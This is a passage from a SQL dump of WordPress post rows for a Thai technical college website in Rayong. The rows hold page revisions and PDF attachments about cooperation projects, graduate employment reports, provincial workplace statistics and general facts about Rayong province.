#0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 15:06:42', '2018-06-18 08:06:42', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3047, 3, '2018-06-18 15:12:28', '2018-06-18 08:12:28', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2560.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2560</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2559.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2558.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2557.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2557</a></span></h3>', 'สรุปโครงการความร่วมมือกับต่างประเทศ ', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7%e0%b8%ad-2', '', '', '2018-06-18 15:14:38', '2018-06-18 08:14:38', '', 0, 'http://www.technicrayong.ac.th/?page_id=3047', 0, 'page', '', 0),
(3048, 3, '2018-06-18 15:11:13', '2018-06-18 08:11:13', '', 'สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7-10', '', '', '2018-06-18 15:11:13', '2018-06-18 08:11:13', '', 3047, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2557.pdf', 0, 'attachment', 'application/pdf', 0),
(3049, 3, '2018-06-18 15:11:17', '2018-06-18 08:11:17', '', 'สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7-11', '', '', '2018-06-18 15:11:17', '2018-06-18 08:11:17', '', 3047, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2558.pdf', 0, 'attachment', 'application/pdf', 0),
(3050, 3, '2018-06-18 15:11:19', '2018-06-18 08:11:19', '', 'สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7-12', '', '', '2018-06-18 15:11:19', '2018-06-18 08:11:19', '', 3047, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2559.pdf', 0, 'attachment', 'application/pdf', 0),
(3051, 3, '2018-06-18 15:11:21', '2018-06-18 08:11:21', '', 'สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2560', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7-13', '', '', '2018-06-18 15:11:21', '2018-06-18 08:11:21', '', 3047, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2560.pdf', 0, 'attachment', 'application/pdf', 0),
(3052, 3, '2018-06-18 15:12:28', '2018-06-18 08:12:28', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2560.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2560</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2559.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2558.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2557.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2557</a></span></h3>', 'สรุปโครงการความร่วมมือกับต่างประเทศ ', '', 'inherit', 'closed', 'closed', '', '3047-revision-v1', '', '', '2018-06-18 15:12:28', '2018-06-18 08:12:28', '', 3047, 'http://www.technicrayong.ac.th/3047-revision-v1/', 0, 'revision', '', 0),
(3053, 3, '2018-06-18 15:14:48', '2018-06-18 08:14:48', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2560.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2560</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2559.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2558.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2557.pdf\">สรุปโครงการความร่วมมือกับต่างประเทศ ปี พ.ศ.2557</a></span></h3>', 'สรุปโครงการความร่วมมือกับต่างประเทศ ', '', 'inherit', 'closed', 'closed', '', '3047-autosave-v1', '', '', '2018-06-18 15:14:48', '2018-06-18 08:14:48', '', 3047, 'http://www.technicrayong.ac.th/3047-autosave-v1/', 0, 'revision', '', 0),
(3054, 3, '2018-06-18 15:17:33', '0000-00-00 00:00:00', '', '', '', 'draft', 'closed', 'closed', '', '', '', '', '2018-06-18 15:17:33', '2018-06-18 08:17:33', '', 0, 'http://www.technicrayong.ac.th/?page_id=3054', 0, 'page', '', 0),
(3055, 3, '2018-06-18 15:17:14', '2018-06-18 08:17:14', '', 'สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี', '', 'inherit', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a1%e0%b8%b7-14', '', '', '2018-06-18 15:17:14', '2018-06-18 08:17:14', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf', 0, 'attachment', 'application/pdf', 0),
(3056, 3, '2018-06-18 15:17:43', '2018-06-18 08:17:43', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 15:17:43', '2018-06-18 08:17:43', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3057, 3, '2018-06-18 15:18:40', '2018-06-18 08:18:40', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สาเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 15:18:40', '2018-06-18 08:18:40', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3058, 3, '2018-06-18 15:19:21', '2018-06-18 08:19:21', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 15:19:21', '2018-06-18 08:19:21', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3060, 3, '2018-06-18 15:19:49', '2018-06-18 08:19:49', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานการติดตามผลผู้สำเร็จการศึกษา-ปีการศึกษา-2559-เข้าสู่ตลาดแรงงาน-พ.ศ.-2560.pdf\">รายงานการติดตามผลผู้สำเร็จการศึกษา ปีการศึกษา 2559 เข้าสู่ตลาดแรงงาน พ.ศ. 2560</a></span></h3>', 'รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน ', '', 'inherit', 'closed', 'closed', '', '3029-revision-v1', '', '', '2018-06-18 15:19:49', '2018-06-18 08:19:49', '', 3029, 'http://www.technicrayong.ac.th/3029-revision-v1/', 0, 'revision', '', 0),
(3061, 3, '2018-06-18 15:20:16', '2018-06-18 08:20:16', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n \r\n\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-18 15:20:16', '2018-06-18 08:20:16', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3063, 3, '2018-06-18 15:27:15', '2018-06-18 08:27:15', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> 